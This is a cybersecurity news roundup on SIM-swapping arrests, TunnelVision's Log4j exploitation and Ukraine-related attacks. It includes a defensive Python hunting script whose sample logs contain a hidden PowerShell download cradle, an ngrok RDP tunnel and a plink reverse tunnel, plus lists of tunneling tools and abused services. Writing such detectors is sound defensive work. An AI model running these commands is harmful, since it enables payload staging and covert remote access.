The Good, the Bad and the Ugly in Cybersecurity – Week 7

The Good

Good news this week comes by way of Spanish law enforcement, which publicly announced the dismantling of a criminal SIM-swapping organization. Investigations into the operation began in March 2021, following official complaints from locations across Spain.

The arrest of eight individuals follows a year-long investigation by the National Police into fraudulent bank transfers. The group’s MO was somewhat different from traditional SIM swapping. In this case, the group sought to extract private information from targets through emails and text messages spoofing banks. The collected data was then used to create fake identity documentation for the next stage in the scam.

Rather than just convincing a carrier to register a different SIM to the target’s number, the gang used their fake documentation to convince employees of phone stores to provide duplicate SIMs, which then gave them access to banking security messages and allowed them to conduct financial transactions. Adding insult to injury, the victims’ devices would be disabled once the gang’s devices were activated with the duplicate SIMs.

The eight detainees – seven from Barcelona and one from Seville – laundered their ill-gotten gains through bank transfers and online payment platforms. Police say that besides the arrests they have also blocked twelve bank accounts associated with the gang’s activities.

The Bad

This week SentinelLabs published research on an Iranian-aligned threat actor called TunnelVision. The research focuses on the threat actor’s exploitation of the Log4j vulnerabilities in VMware Horizon. The TunnelVision actor has been observed targeting organizations throughout the Middle East and the United States.

TunnelVision has been actively exploiting the Log4j vulnerability in VMware Horizon to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.

The research looks at how this threat actor evolves its attack techniques by making use of 1-day vulnerabilities – bugs in software that have recently been patched by vendors but not yet widely updated by organizations. Once the actors gain initial access, they download tunneling software such as ngrok, Plink and FRPC (Fast Reverse Proxy Client). The threat actor also aims to avoid detection of its C2 activity by making use of legitimate public services such as Pastebin, transfer.sh and webhook.site, among others.
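The tooling and services named above make a compact hunting signature for defenders. The following is an added example (not from the SentinelLabs research or any SentinelOne product) that scores constructed process-creation log lines for the tunneling binaries and public services the report associates with TunnelVision; the log format, host names, the `tomcat.exe` parent stand-in for the Horizon web service and the URLs are all assumptions made up for the sample.

```python
"""Hunt for TunnelVision-style tunneling tools and public-service C2 in
process-creation telemetry. All sample data below is constructed."""
import re
from typing import Dict, List

# Tunneling binaries named in the SentinelLabs research.
TUNNEL_TOOLS = {"ngrok", "plink", "frpc"}
# Legitimate public services the actor abused for staging / C2.
ABUSED_SERVICES = ("pastebin.com", "transfer.sh", "webhook.site")

# Constructed telemetry: "<ts> <host> parent=<proc> image=<proc> cmd="<...>"".
# "tomcat.exe" is a placeholder for the Horizon web-service parent process.
SAMPLE_LOGS = [
    '2022-02-16T09:14:02Z horizon01 parent=tomcat.exe image=powershell.exe cmd="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadString(\'https://transfer.sh/placeholder/stage.ps1\')"',
    '2022-02-16T09:14:20Z horizon01 parent=powershell.exe image=ngrok.exe cmd="ngrok tcp 3389"',
    '2022-02-16T09:20:11Z files02 parent=explorer.exe image=notepad.exe cmd="notepad.exe report.txt"',
    '2022-02-16T09:31:45Z horizon01 parent=powershell.exe image=plink.exe cmd="plink.exe -R 8080:127.0.0.1:8080 user@203.0.113.10"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)


def classify(line: str) -> List[str]:
    """Return the reasons a log line is suspicious; an empty list means benign."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    image = m["image"].lower().removesuffix(".exe")
    cmd = m["cmd"].lower()
    if image in TUNNEL_TOOLS:
        reasons.append(f"tunnel tool: {image}")
    for svc in ABUSED_SERVICES:
        if svc in cmd:
            reasons.append(f"public service in command line: {svc}")
    # A web-service process spawning PowerShell is the post-exploitation
    # pattern described for the Horizon Log4j chain.
    if image == "powershell" and m["parent"].lower().startswith("tomcat"):
        reasons.append("powershell spawned by web service")
    return reasons


def hunt(lines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious line to its reasons, dropping benign lines."""
    hits = {}
    for ln in lines:
        reasons = classify(ln)
        if reasons:
            hits[ln] = reasons
    return hits


if __name__ == "__main__":
    for ln, why in hunt(SAMPLE_LOGS).items():
        print(ln.split(" cmd=")[0], "->", "; ".join(why))
```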

While the group’s activity is not new – other vendors have tracked activity similar to TunnelVision under different, sometimes overlapping, threat actor names – SentinelLabs says that the cluster of activity they have observed is distinct enough to warrant unique attribution.

The Ugly

As tensions continue to rise over the Ukrainian crisis, threat activity in the cyber domain has escalated in the last week. Multiple events have occurred, including disruptions to Ukrainian technology services, activity apparently intended for psychological impact and, of course, disinformation.

Multiple Ukrainian bank services and the Ukrainian Ministry of Defense website were temporarily inaccessible due to a DDoS attack this week. Additionally, fake SMS messages have been circulating in Ukraine claiming a large impact to the ATM services across the country. The true objective of these attacks is unclear; however, one theory is that the attackers were attempting to have a psychological impact on the citizens of Ukraine, as well as draw the attention of media outlets around the world.

Disinformation campaigns are also apparent, with the West noting that Russian-controlled media is being seeded with stories of false provocations against Russian interests. Russia’s Foreign Ministry briefed journalists on Monday saying that “Moscow does not rule out provocations against the self-proclaimed republics in Donbass”. Meanwhile, Russia continues to claim that the U.S., in particular, is being deliberately alarmist and using language that only serves to inflame the situation. The Polish Ministry of Foreign Affairs has also been vocal in calling out Russian disinformation on social media.

One thing that no one is in doubt about, however, is that organizations need to be wary of the potential for cyber attacks related to the ongoing situation. CISA released an advisory Wednesday recommending that network defenders review the TTPs and IoCs around suspected MBR wiper activity seen targeting Ukrainian organizations. The potential for malicious cyber activity well beyond that realm, particularly against U.S. targets, should not be underestimated.